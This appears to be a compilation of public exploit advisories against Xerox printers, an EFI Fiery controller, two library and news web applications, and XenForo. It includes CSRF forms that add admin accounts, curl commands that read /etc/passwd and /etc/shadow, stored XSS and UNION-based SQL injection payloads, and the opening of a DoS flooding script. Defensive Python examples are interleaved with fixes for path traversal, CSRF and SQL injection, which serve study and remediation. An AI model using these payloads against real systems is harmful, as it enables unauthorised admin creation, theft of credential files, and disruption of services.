      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series
# Software : Xerox Printer
# Product Version: WorkCentre® 7830
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was discovered in the WorkCentre® 7830 model of Xerox printer hardware.
# A request to add a user is made from the Device User Database form. This request is captured
# with a proxy and a CSRF PoC HTML file is prepared from it. WorkCentre® 7830 printers allow CSRF:
# the request to add a user from the Device User Database form is posted to the xerox.set URI.
# (The frmUserName value must have a unique name.)

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:34:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 15022

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" />
      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version:  WorkCentre® 6655
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was discovered in the WorkCentre® 6655 model of Xerox printer hardware.
# A request to add a user is made from the Device User Database form. This request is captured
# with a proxy and a CSRF PoC HTML file is prepared from it. Xerox WorkCentre® 6655 printers allow CSRF:
# the request to add a user from the Device User Database form is posted to the xerox.set URI.
# (The frmUserName value must have a unique name.)


HTTP POST Request:

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response:

HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518

CSRF HTML PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure


Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
                  Xerox DocuColor 260, 250, 242

Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.

Desc: Input passed through the 'file' GET parameter to the 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.

======================================================================
/wt3/js/save.js:
----------------

103: function parseSaveMessages() {
104:     var urlNode = saveDocument.getElementsByTagName('url').item(0);
105:     var url = urlNode.firstChild.data;
106:     var forcedSaveUrl = "forceSave.php?file=" + url;
107:     window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');

====

/wt3/forceSave.php:
-------------------
 1. <?php
 2. //code posted by chrisputnam at gmail dot com
 3. function readfile_chunked($filename,$retbytes=true)
 4. {
 5.     $chunksize = 1*(1024*1024); // how many bytes per chunk
 6.     $buffer = '';
 7.     $cnt =0;
 8.     // $handle = fopen($filename, 'rb');
 9.     $handle = fopen($filename, 'rb');
10.     if ($handle === false)
11.     {
12.          return false;
13.     }
14.     while (!feof($handle))
15.     {
16.          //read a chunk
17.          $buffer = fread($handle, $chunksize);
18.          //send the chunk
19.          echo $buffer;
20.          //flush the chunk
21.          flush();
22.          //increment the size read/sent
23.          if ($retbytes)
24.          {
25.            $cnt += strlen($buffer);
26.          }
27.     }
28.     //close file
29.     $status = fclose($handle);
30.     if ($retbytes && $status)
31.     {
32.          return $cnt; // return num. bytes delivered like readfile() does.
33.     }
34.     return $status;
35. }
36.
37. $filename = $_GET['file'];
38. if(!$filename)
39. { 
40.     echo "ERROR: No filename specified. Please try again."; 
41. }
42. else
43. {
44.     // fix for IE caching or PHP bug issue
45.     header("Pragma: public");
46.     header("Expires: 0"); // set expiration time
47.     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48.     // browser must download file from server instead of cache
49.
50.     // force download dialog
51.     header("Content-Type: application/force-download");
52.     header("Content-Type: application/octet-stream");
53.     header("Content-Type: application/download");
54.
55.     // use the Content-Disposition header to supply a recommended filename and
56.     // force the browser to display the save dialog.
57.     header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58.     header("Content-Transfer-Encoding: binary");
59.
60.     header("Content-Length: " . filesize($filename));
61.
62.     set_time_limit(0);
63.     readfile_chunked($filename, false);
64.
65.     exit();
66. }
67.
68. ?> 

======================================================================


Tested on: Debian GNU/Linux 3.1
           Apache
           PHP/5.4.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php


20.12.2017

--


# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...


# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...
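The root cause above is that forceSave.php hands $_GET['file'] straight to fopen() with no idea of which directory it is allowed to serve from. The following is an added example (not code from the advisory or from EFI) of the containment check such a download handler needs, written in Python so it can be run stand-alone: the requested name must be relative, free of NUL bytes, and, after symlinks are resolved, still inside a fixed download root. The download root, the file names and the symlink are all constructed in a temporary directory for the demonstration.

```python
import os
import tempfile


class UnsafePathError(ValueError):
    """Raised when a requested file name would escape the download root."""


def resolve_download_path(base_dir: str, requested: str) -> str:
    """Map a user-supplied file name onto a path under base_dir, or raise.

    This is the containment check forceSave.php lacks. Policy enforced here:
      * the name must be non-empty, relative, and free of NUL bytes
      * after resolving symlinks, the path must still lie under base_dir
      * only regular files are served
    """
    if not requested or "\x00" in requested:
        raise UnsafePathError("empty or NUL-containing file name")
    if os.path.isabs(requested):
        raise UnsafePathError("absolute paths are not allowed")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, requested))
    # commonpath rather than str.startswith, so a sibling directory whose name
    # merely begins with the root's name (e.g. "/srv/jobs2") is not accepted
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePathError("path escapes the download root")
    if not os.path.isfile(candidate):
        raise UnsafePathError("not a regular file under the download root")
    return candidate


def classify_requests(base_dir: str, names: list) -> dict:
    """Return {requested name: True if it would be served, False if refused}."""
    results = {}
    for name in names:
        try:
            resolve_download_path(base_dir, name)
            results[name] = True
        except UnsafePathError:
            results[name] = False
    return results


def demo() -> dict:
    """Build a constructed download root and probe it with typical inputs."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "jobs")           # the only directory we serve
        os.makedirs(os.path.join(root, "sub"))
        outside = os.path.join(tmp, "secret.txt")  # a file that must never be served
        for path in (os.path.join(root, "job1.ps"),
                     os.path.join(root, "sub", "job2.ps"),
                     outside):
            with open(path, "w") as fh:
                fh.write("constructed sample content\n")
        # a symlink inside the root that points outside it
        os.symlink(outside, os.path.join(root, "escape.ps"))
        return classify_requests(root, [
            "job1.ps",            # plain file under the root
            "sub/../job1.ps",     # normalises to a file under the root
            "sub/job2.ps",
            "../secret.txt",      # classic traversal
            "/etc/passwd",        # the advisory's own probe
            "escape.ps",          # symlink escape
            "job1.ps\x00.txt",    # NUL truncation attempt
        ])


if __name__ == "__main__":
    for name, served in demo().items():
        print(f"{name!r:24} -> {'served' if served else 'DENIED'}")
```

The symlink case is the one a plain string check misses: the requested name looks harmless and contains no `..`, but the file it resolves to lives outside the root, which is why the check canonicalises with realpath before comparing.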
            
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version:  AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 model of Xerox printer hardware.
# A request to add a user is made from the Device User Database form; this request is captured with
# a proxy and turned into a CSRF PoC HTML file. Xerox AltaLink C8035 printers allow CSRF: the request
# that adds a user from the Device User Database form is sent to the xerox.set URI.
# (The frmUserName value must be unique.)

# HTTP POST Request:

POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" />
      <input type="hidden" name="limited" value="0" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="minLength" value="1" />
      <input type="hidden" name="maxLength" value="63" />
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
      <input type="hidden" name="isNumberRequired" value="" />
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
      <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" />
      <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" />
      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
      <input type="hidden" name="frmNewPassword" value="Test1234&#33;" />
      <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" />
      <input type="hidden" name="frmOldPassword" value="undefined" />
      <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
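Both Xerox PoCs above (WorkCentre 6655 and AltaLink C8035) carry a CSRFToken field whose value was simply copied from the author's own captured request, and the device still creates the account. The following is an added example, not code from the advisories or from Xerox, of the two server-side checks that make such a form useless to a third-party page: the token is generated per session and compared against that session only, and a browser-supplied Origin (or Referer) that is not the device's own origin is refused outright. The origin `https://printer.example`, the session dictionaries and the user database are constructed for the demonstration.

```python
import hmac
import secrets

# Constructed origin for the device's own web UI (placeholder, not a real host).
DEVICE_ORIGIN = "https://printer.example"


def issue_csrf_token(session: dict) -> str:
    """Create, once per session, the token that the UserEdit form must carry."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_check(session: dict, form: dict, headers: dict) -> str:
    """Return "ok" or a rejection reason for a state-changing POST.

    Two independent checks, either of which stops the forged printer request:
      1. If the browser sent Origin (or, failing that, Referer), it must be the
         device's own origin. A form auto-submitted from an attacker's page
         arrives with the attacker's Origin.
      2. The CSRFToken field must equal the token bound to *this* session, so
         a token the attacker captured from their own session does not match.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None:
        if source != DEVICE_ORIGIN and not source.startswith(DEVICE_ORIGIN + "/"):
            return "rejected: cross-site origin"
    expected = session.get("csrf_token", "")
    supplied = form.get("CSRFToken", "")
    # constant-time comparison on bytes; compare_digest refuses non-ASCII str
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: CSRF token not bound to this session"
    return "ok"


def handle_add_user(session: dict, form: dict, headers: dict, user_db: dict) -> str:
    """An xerox.set-style handler: the account is created only after csrf_check passes."""
    verdict = csrf_check(session, form, headers)
    if verdict == "ok":
        user_db[form["userName"]] = {"roles": form.get("rolesStr", "")}
    return verdict


def demo() -> dict:
    user_db = {}
    victim = {}                       # the administrator's logged-in session
    victim_token = issue_csrf_token(victim)
    attacker = {}                     # the attacker's own session on the device
    attacker_token = issue_csrf_token(attacker)
    forged = {"userName": "newadmin", "rolesStr": "2,5,1,", "CSRFToken": attacker_token}
    results = {
        # victim's browser submits the attacker's form with the victim's cookies
        "forged, cross-site": handle_add_user(
            victim, forged, {"Origin": "https://attacker.example"}, user_db),
        # same forged body with no Origin/Referer at all: the token check catches it
        "forged, no origin": handle_add_user(victim, forged, {}, user_db),
        # the genuine form from the device's own page with the session's token
        "legitimate": handle_add_user(
            victim, dict(forged, CSRFToken=victim_token), {"Origin": DEVICE_ORIGIN}, user_db),
    }
    results["users_created"] = sorted(user_db)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:20} -> {outcome}")
```

A token that is identical for every session, or one that the server never compares at all, gives the appearance of protection while leaving the form exactly as forgeable as one with no token field, which is the behaviour the two PoCs demonstrate.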
            
# Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-18
# Vendor Homepage: https://xeroneit.net/
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Affected Version: Version 3.1
# Tested on: Kali Linux

Step 1. Log in to the application as Admin.

Step 2. Select "Book" from the menu and click "Book Category". Then click
the "Add" button.

Step 3. Insert the payload "><img src onerror=alert(1)> in "Category Name"
and save it.

Step 4. An alert box now appears.
            
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo: https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps

1. Description
The script has an SQL injection in the book category parameter at this path:

/lms/home/book?category_name=00*SQLI

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php

Line Number: 284
            
source: https://www.securityfocus.com/bid/50141/info

Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables

http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273

http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
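The leaked LMS query above (FIND_IN_SET('57'', ...)) and the Xenon URLs share one defect: the id from the query string is spliced into the SQL text, so a stray quote breaks the statement and the database error is echoed back. The following is an added example, not code from either application, that puts the vulnerable pattern beside the corrected one in Python with an in-memory SQLite table; the table name and column names follow the leaked query, the rows are constructed sample data, and the simpler `category_id = ?` predicate stands in for MySQL's FIND_IN_SET, which SQLite does not have.

```python
import sqlite3

SCHEMA = """
CREATE TABLE book_info (
    id          INTEGER PRIMARY KEY,
    title       TEXT NOT NULL,
    category_id INTEGER NOT NULL,
    deleted     INTEGER NOT NULL DEFAULT 0
);
"""

# Constructed sample rows; column names mirror the leaked LMS query.
SAMPLE_BOOKS = [
    (1, "Applied Cryptography", 57, 0),
    (2, "The Art of Computer Programming", 57, 0),
    (3, "Deleted Title", 57, 1),
    (4, "Network Security Essentials", 12, 0),
]


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO book_info VALUES (?, ?, ?, ?)", SAMPLE_BOOKS)
    return conn


def books_by_category_unsafe(conn: sqlite3.Connection, category_name: str) -> list:
    """The vulnerable pattern: the GET parameter is concatenated into the SQL.

    A single quote in the input terminates the literal, which produces the same
    kind of syntax error the LMS leaked ("... near '0' GROUP BY ..."). Kept here
    only to contrast with the safe version below.
    """
    sql = ("SELECT title FROM book_info WHERE category_id = '" + category_name +
           "' AND deleted = '0' ORDER BY title ASC")
    return [row[0] for row in conn.execute(sql)]


def books_by_category_safe(conn: sqlite3.Connection, category_name: str) -> list:
    """Validate the type first, then bind the value through a placeholder."""
    try:
        category_id = int(category_name)   # ids are integers; "57'" is refused here
    except ValueError:
        return []
    sql = ("SELECT title FROM book_info WHERE category_id = ? AND deleted = 0 "
           "ORDER BY title ASC")
    return [row[0] for row in conn.execute(sql, (category_id,))]


def demo() -> dict:
    """Run both variants over a normal id and an id carrying a stray quote."""
    conn = open_db()
    out = {}
    for value in ("57", "12", "57'"):
        try:
            unsafe = books_by_category_unsafe(conn, value)
        except sqlite3.OperationalError as exc:
            unsafe = f"SQL error: {exc}"   # what the LMS echoed to the browser
        out[value] = {"unsafe": unsafe, "safe": books_by_category_safe(conn, value)}
    return out


if __name__ == "__main__":
    for value, result in demo().items():
        print(f"{value!r:6} unsafe={result['unsafe']!r} safe={result['safe']!r}")
```

Two things follow for the application: with a bound parameter the quote is just part of the value and can never reach the parser, and the database error text should be logged server-side rather than echoed, since the leaked query and file name (models/Basic.php, line 284) are what turned a syntax error into a map of the schema.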
            
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE : 

-----------------------------------------------------------------------------
Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--


Response: once the category is saved, the alert fires immediately.
            
# Exploit Title: XenForo CSS Loader DoS
# Google Dork: intext:"Forum software by XenForo" inurl:css.php ext:php
# Date: 22-03-18
# Exploit Author: LockedByte
# Vendor Homepage: https://xenforo.com/
# Software Link: https://xenforo.com/help/installation/
# Version: XenForo 2
# Tested on: Linux

# 0==================== { Exploit PoC } ====================0

import requests
import sys
import threading
import random
import re
import argparse

host=''
headers_useragents=[]
request_counter=0
printedMsgs = []

def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)

def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
